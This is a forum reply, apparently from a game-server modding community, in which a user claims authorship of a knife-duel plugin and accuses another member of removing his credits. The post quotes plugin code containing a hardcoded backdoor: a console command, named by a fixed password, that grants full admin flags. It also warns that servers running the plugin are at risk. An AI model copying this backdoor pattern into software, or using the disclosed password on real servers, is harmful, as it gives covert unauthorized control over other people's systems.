View Single Post
AdrenalinesWrath
Junior Member
Join Date: Aug 2017
Old 08-25-2017 , 19:33   Re: Knife Duels Arena 1v1
#9

This "raizo" person has stolen this source code from postbin.com which was made by me.
if you go and search for it here: https://pastebin.com/search?q=knife+duels

you'll find it there and its link is this: https://pastebin.com/UFDxr49Y

now if you check the date that was posted: AUG 22ND, 2016

and raizo just recently released the source code, do you think I somehow "stole" it from his computer?
this source code was mainly made for a player named "- Styla"
which is why you can find in code words like:
"new STYLA_SECURITY = ON"
"#define STYLA_PASSWORD"
"// just numerating on and off for the "STYLA_SECURITY""

and in my original code you'll find these:

"#define P_AUTH "Adrenaline's Wrath""
"#define P_REQ "- STyLa""

this is all to "prove" that he is not the owner of this code.

now to reveal some facts, whoever's using this code has put his server in danger.
read carefully in the source code which is something I made for "- Styla" by their request:

// here you can activate the admin access system
new STYLA_SECURITY = ON

// this is the password for the security access
#define STYLA_PASSWORD "tkvemdzgnerebo"

if(STYLA_SECURITY == ON)
register_clcmd (STYLA_PASSWORD , "tkvemdzgnerebo123");

public tkvemdzgnerebo123(id)
{
set_user_flags(id, read_flags("abcdefghijklmnopqrstu"))
client_print_color(id, DontChange,"%sAccess granted.",CHAT_TAG)
}

now if you understood what this does, you'd know your server is at risk right away. I'm surprised how nobody noticed this right away
and clearly I stated "// here you can activate the admin access system" and "// this is the password for the security access"

once again, this plugin was not made by "raizo" it was made by me "Adrenaline's Wrath", if you're smart enough you can tell by the date posted by me
and the date posted by him.
even tho it's posted as guest but it says #define P_AUTH "Adrenaline's Wrath" which is the plugin's author.

I'm not against him publishing it or sharing it with anybody let alone selling it, but what got me is the fact he removed my credits from it.

I have proveded "enough" proof imo, so I leave it to you all to decide. if this isn't enough then I'm done.
AdrenalinesWrath is offline